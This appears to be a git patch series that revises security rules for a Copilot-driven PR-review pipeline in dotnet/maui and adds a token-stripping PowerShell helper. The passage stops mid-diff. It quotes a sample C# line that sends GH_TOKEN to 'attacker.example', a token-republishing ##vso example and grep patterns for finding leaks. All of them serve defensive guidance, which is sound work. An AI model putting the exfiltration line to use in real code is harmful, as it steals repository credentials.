-applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +description: "Security rules for the Copilot PR-review pipeline. Read before editing." +applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" --- -# CI Copilot Pipeline — Security Rules +# CI Copilot pipeline — security rules -This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with privileged tokens in scope**: +This pipeline runs **untrusted PR code** on AzDO agents with these tokens in scope: -| Token | Identity | Scope | -|-------|----------|-------| -| `GH_COMMENT_TOKEN` (a.k.a. 
`GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo | -| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI | -| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows | +- `GH_COMMENT_TOKEN` / `GH_TOKEN` — `maui-bot` PAT (post comments, labels, reviews on any PR) +- `COPILOT_GITHUB_TOKEN` — Copilot CLI install token +- AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows -A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline. +Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. ---- - -## Threat model — assume the PR is hostile - -By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls: +## Rules -- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected) -- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree -- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files +1. **Per-task `env:` scoping.** Only put tokens a task needs. The Copilot-agent task gets `COPILOT_GITHUB_TOKEN` only — never `GH_TOKEN`. Pass `--secret-env-vars=GH_TOKEN,GITHUB_TOKEN,COPILOT_GITHUB_TOKEN` to the Copilot CLI. 
-The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**. - ---- +2. **`persistCredentials: false` on every `checkout: self`** unless the task pushes. Default checkout writes the service-connection PAT into `.git/config` as `extraheader`, readable by any subprocess. -## Rule 1 — Per-task token scoping (AzDO `env:` block) +3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block. -Each task's `env:` block contains **only** the tokens that exact task needs. +4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token. -```yaml -# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token -- bash: | - pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... - env: - COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - # NO GH_TOKEN here — Copilot can't post comments or push -``` +5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. 
Readers must not silently fall back to a worktree path if the trusted one is missing. -```yaml -# ❌ wrong — leaks the comment token into the Copilot agent's env -- bash: | - pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... - env: - COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - GH_TOKEN: $(GH_COMMENT_TOKEN) -``` +6. **Strip `##vso[...]` from PR-controlled stdout.** Pipe through `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'` — bare `sed` misses CRLF lines and the agent will execute the directive. -When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output. +7. **`gh-aw` workflows.** Pin compiler version (≥ v0.68.4 strips `pull-requests: write` per `gh-aw#28767`). Regenerate `.lock.yml` with `gh aw compile` in the **same commit** as any `.md` frontmatter edit (stale lock ⇒ all dispatches fail). `workflow_dispatch` triggers must restore trusted `.github/` from main (see `Checkout-GhAwPr.ps1`). -## Rule 2 — `persistCredentials: false` on every `checkout: self` +8. **No token republish.** Don't `setvariable` a token (visible to every later task, even with `issecret=true`). Don't write tokens to worktree files. Don't echo token names. -AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as: +## Review checklist -``` -[http "https://github.com/"] - extraheader = AUTHORIZATION: bearer -``` +- [ ] New `checkout: self` has `persistCredentials: false`. +- [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`. +- [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block. +- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`. 
+- [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`. +- [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. +- [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit. -Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push. - -```yaml -# ✅ correct -- checkout: self - persistCredentials: false - fetchDepth: 1 -``` - -```yaml -# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job -- checkout: self - fetchDepth: 1 -``` - -This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent. - -## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only - -The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree. 
+## Grep these during review ```bash -# ✅ correct — in Setup task, BEFORE any `git merge` of PR code -TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" -mkdir -p "$TRUSTED" -cp -r .github/scripts "$TRUSTED/scripts" -cp -r .github/skills "$TRUSTED/skills" -cp -r eng/scripts "$TRUSTED/eng-scripts" -chmod -R a-w "$TRUSTED" # ← prevents PR code from rewriting trusted scripts at runtime -``` - -When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`: - -```powershell -# ✅ correct — resolve via the trusted dir -$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } -$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } -$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } - -& "$SkillsDir/foo/scripts/foo.ps1" ... -``` - -```powershell -# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env -$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" -& $detectScript -PRNumber $PRNumber -``` - -**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable. - -## Rule 4 — Strip tokens from env before invoking PR-controlled code - -Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `` blocks, source generators, analyzers, then the test/app code). 
Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via: - -```xml - - - - -``` - -```csharp -// attacker's test code -[ModuleInitializer] -public static void Leak() => HttpClient.GetAsync("attacker.example/?t=" + - Environment.GetEnvironmentVariable("GH_TOKEN")); -``` - -The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code. - -Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script): - -```powershell -# ✅ correct — token stripped for the subprocess only, restored after -$testOutput = Invoke-WithoutGhTokens { - dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 -} -``` - -```powershell -# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it -$testOutput = dotnet test $resolvedProj --filter $t.Filter ... -``` - -**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`. - -## Rule 5 — Cross-phase signal files live outside the working tree - -The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`. - -```powershell -# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code -$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..." 
} -"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -``` - -```powershell -# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS" -"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt") -``` - -The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing. - -## Rule 6 — Strip `##vso[...]` from PR-controlled output - -`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks. - -```bash -# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands -"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g' -``` - -```bash -# ❌ wrong — bare sed won't match if PR output has CRLF line endings -"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g' -``` - -## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/` - -For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow: - -- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter. -- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`. -- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`. 
- -## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read - -```yaml -# ❌ wrong — once written to AzDO variable store, the value is visible to every later task -- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)" -``` - -Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius. - ---- - -## Code-review checklist for this surface - -When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list: - -- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why). -- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`. -- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`. -- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task. -- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`. -- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`. -- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. 
-- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit. -- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree. - -## Anti-patterns to grep for during review - -```bash -# Token leak to PR-controlled subprocess -git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens - -# Script invoked from PR worktree instead of trusted copy -git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/ - -# Missing persistCredentials +git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts .github/skills | grep -v Invoke-WithoutGhTokens +git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts .github/skills git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials - -# Cross-phase state in worktree -git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/ - -# Bare ##vso strip without CR handling -git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d" +git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts .github/skills +git grep -nE 'sed.*##vso' eng/pipelines/ci-copilot.yml | grep -v 'tr -d' ``` - ---- - -## References - -- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues -- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations -- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts -- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper -- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern From 
7ade47d22efad51cbeb2bff8cb19a53a32c2c4f5 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:47:28 +0200 Subject: [PATCH 11/34] [CI] Use YAML list + brace alternation for applyTo Switch from a 12-entry comma-separated string to a 6-entry YAML list, matching the format the majority of .github/instructions files already use. Uses minimatch brace expansion ({pr-review,verify-tests-fail-...}) and extension wildcards (workflows/*.{md,yml,lock.yml}) to drop 6 hardcoded paths. Validated to match 70 files across the surface (ci-copilot.yml + 41 scripts + 19 skill files + 4 phase docs + 4 workflows + 1 detector). Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../ci-copilot-pipeline-security.instructions.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index d98cf17fab22..8768df114d82 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,6 +1,12 @@ --- description: "Security rules for the Copilot PR-review pipeline. Read before editing." 
-applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +applyTo: + - "eng/pipelines/ci-copilot.yml" + - "eng/scripts/detect-ui-test-categories.ps1" + - ".github/scripts/**" + - ".github/pr-review/**" + - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**" + - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*" --- # CI Copilot pipeline — security rules From 0e3ce9d8e63072fdf9911814228f769fd67bd71e Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 13:11:17 +0200 Subject: [PATCH 12/34] [CI] Use officially-documented applyTo syntax + drop scare line Two changes: 1. Drop the "account/repo takeover" framing from the intro -- the threat-model bullets already list what each token grants; leave the consequences implicit. 2. Switch applyTo from YAML list + brace expansion to the single comma-separated string format documented by GitHub: https://docs.github.com/en/copilot/how-tos/configure-custom-instructions/add-repository-instructions The official docs explicitly support multiple patterns via a comma-separated string (example: applyTo: "**/*.ts,**/*.tsx"). YAML list form and {a,b,c} brace expansion are NOT documented. The web-side parser (Copilot coding agent + code review on github.com) splits on commas first, which would shatter any brace expression into garbage globs. Comma-separated string works in VS Code Copilot, Copilot CLI, and on github.com. Kept the .* extension wildcard for copilot-evaluate-tests.* (standard glob, covers .md + .lock.yml). 
Validated 70 files matched across 11 patterns with brace expansion disabled. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../ci-copilot-pipeline-security.instructions.md | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index 8768df114d82..ce3e29f667a4 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,12 +1,6 @@ --- description: "Security rules for the Copilot PR-review pipeline. Read before editing." -applyTo: - - "eng/pipelines/ci-copilot.yml" - - "eng/scripts/detect-ui-test-categories.ps1" - - ".github/scripts/**" - - ".github/pr-review/**" - - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**" - - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*" +applyTo: "eng/pipelines/ci-copilot.yml,eng/scripts/detect-ui-test-categories.ps1,.github/scripts/**,.github/pr-review/**,.github/skills/pr-review/**,.github/skills/verify-tests-fail-without-fix/**,.github/skills/try-fix/**,.github/skills/run-device-tests/**,.github/workflows/review-trigger.yml,.github/workflows/pr-review-queue.yml,.github/workflows/copilot-evaluate-tests.*" --- # CI Copilot pipeline — security rules @@ -17,7 +11,7 @@ This pipeline runs **untrusted PR code** on AzDO agents with these tokens in sco - `COPILOT_GITHUB_TOKEN` — Copilot CLI install token - AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows -Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. 
+Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. ## Rules From 888febc9e980ebcb5793ae64a685ce5fc2d55c94 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 20:20:01 +0200 Subject: [PATCH 13/34] [CI] Fix Gate: move token-strip wrap inside verify-tests-fail.ps1 The previous commit wrapped the WHOLE verify-tests-fail.ps1 invocation in Invoke-WithoutGhTokens at the Review-PR.ps1 level. That broke the Gate because verify-tests-fail.ps1 itself needs GH_TOKEN to call Detect-TestsInDiff.ps1, which uses `gh api repos/.../pulls/N/files` to enumerate PR files for test-type detection. Right design: wrap as close to the PR-controlled subprocess as possible, NOT at the outer trusted-script boundary. A trusted script may need `gh` itself for metadata. Changes: - verify-tests-fail.ps1: add Invoke-WithoutGhTokens helper, wrap the 4 PR-code subprocess sites inside Invoke-TestRun (UI BuildAndRun, XAML dotnet test, Unit dotnet test, Device Run-DeviceTests). - Review-PR.ps1: unwrap the outer pwsh -File $verifyScript call. Add comment explaining why this one is intentionally not wrapped. - ci-copilot-pipeline-security.instructions.md Rule 4: clarify "wrap as close to the subprocess as possible, not at the outer trusted-script boundary"; drop verify-tests-fail.ps1 from the list of scripts to wrap (it wraps its own internal calls now); update review checklist to say "AT THE CALL SITE". 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 4 +-- .github/scripts/Review-PR.ps1 | 6 +++- .../scripts/verify-tests-fail.ps1 | 30 ++++++++++++++++--- 3 files changed, 33 insertions(+), 7 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index ce3e29f667a4..b77f09904152 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -21,7 +21,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D 3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block. -4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token. +4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... 
}` (defined in `Review-PR.ps1` and `verify-tests-fail.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). **Wrap as close to the subprocess as possible, not at the outer trusted-script boundary** — a trusted script may itself need `gh` for metadata (e.g., `verify-tests-fail.ps1` calls `Detect-TestsInDiff.ps1` which uses `gh api`), so wrapping the whole script breaks its detection path. Wrap only the line that launches the PR-controlled process. Exception: scripts that ONLY call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) don't need wrapping at all — they keep the token. 5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. Readers must not silently fall back to a worktree path if the trusted one is missing. @@ -36,7 +36,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D - [ ] New `checkout: self` has `persistCredentials: false`. - [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`. - [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block. -- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`. +- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens` AT THE CALL SITE (not at an outer boundary). - [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`. - [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. - [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit. 
diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 432fdc2219e4..cb39a45faf59 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1509,7 +1509,11 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { # PR like a regression repro), it falls back to "verify failure only" mode # and reports whether the new tests fail without any fix. Passing the flag # would force the script to error out for those PRs. - $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 } + # Note: NOT wrapped in Invoke-WithoutGhTokens here — verify-tests-fail.ps1 + # itself needs GH_TOKEN to invoke Detect-TestsInDiff.ps1 (which calls `gh api` + # to enumerate PR files). The script wraps its OWN dotnet/host-app/device-test + # subprocess invocations internally to strip the token before PR code runs. + $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 $gateExitCode = $LASTEXITCODE $gateOutput | ForEach-Object { Write-Host " $_" } diff --git a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 index c623c8a8860f..e54d900a1cf1 100644 --- a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 +++ b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 @@ -104,6 +104,28 @@ if ($Platform -eq "maccatalyst") { $Platform = "catalyst" } +# ============================================================ +# Strip GH/Copilot tokens from environment for the duration of a +# scriptblock that invokes PR-controlled code (dotnet test, MSBuild, +# host-app, device tests). Trusted metadata fetches via `gh` CLI +# (Detect-TestsInDiff, gh pr view) keep the token because they run +# OUTSIDE this wrapper. 
See .github/instructions/ci-copilot-pipeline-security.instructions.md. +# ============================================================ +function Invoke-WithoutGhTokens { + param([Parameter(Mandatory)][scriptblock]$ScriptBlock) + $saved = @{} + foreach ($n in @('GH_TOKEN','GITHUB_TOKEN','COPILOT_GITHUB_TOKEN')) { + $saved[$n] = [Environment]::GetEnvironmentVariable($n) + [Environment]::SetEnvironmentVariable($n, $null) + } + try { & $ScriptBlock } + finally { + foreach ($n in $saved.Keys) { + [Environment]::SetEnvironmentVariable($n, $saved[$n]) + } + } +} + # Platform is required for UI and device tests, optional for unit/XAML tests if ($TestType -in @("UITest", "DeviceTest") -and -not $Platform) { throw "$TestType requires -Platform parameter (android, ios, catalyst, windows)." @@ -354,7 +376,7 @@ function Invoke-TestRun { $uiParams.DeviceUdid = $script:BootedDeviceUdid } # Capture all output — includes build, deploy, and test results - $scriptOutput = & $buildScript @uiParams 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & $buildScript @uiParams 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -379,7 +401,7 @@ function Invoke-TestRun { $testArgs += @("--filter", $Filter) } - $scriptOutput = & dotnet @testArgs 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -417,7 +439,7 @@ function Invoke-TestRun { $testArgs += @("--filter", $Filter) } - $scriptOutput = & dotnet @testArgs 2>&1 + 